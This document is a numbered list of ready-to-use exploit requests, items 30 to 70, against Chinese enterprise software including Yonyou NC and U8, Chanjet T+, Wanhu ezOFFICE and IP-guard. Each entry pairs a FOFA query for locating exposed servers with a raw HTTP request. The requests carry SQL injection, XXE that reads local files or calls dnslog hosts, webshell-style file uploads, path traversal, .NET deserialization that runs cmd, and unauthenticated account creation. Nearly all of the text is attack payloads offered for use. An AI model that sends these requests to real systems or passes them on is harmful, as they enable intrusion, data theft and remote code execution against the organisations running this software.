FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
The endpoint is the PrimeFaces dynamiccontent.properties EL injection (CVE-2017-1000486).
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
The sql parameter is base64; the value below decodes to select 1,user(),3.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
Time-based blind injection against MSSQL: a response delayed by about 5 seconds indicates the sId value reached the query unescaped.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 the injected UNION query computes), the injection is confirmed.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir the directory it is written to, and fileType the extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
The ";.js" suffix is a servlet path parameter: extension-based access filters see a static .js resource, while the container still dispatches the request to the JSP.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
The command to run is passed base64-encoded in the SID header (the value below decodes to type C:\Windows\win.ini); the __VIEWSTATE body carries the deserialization payload, omitted here.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
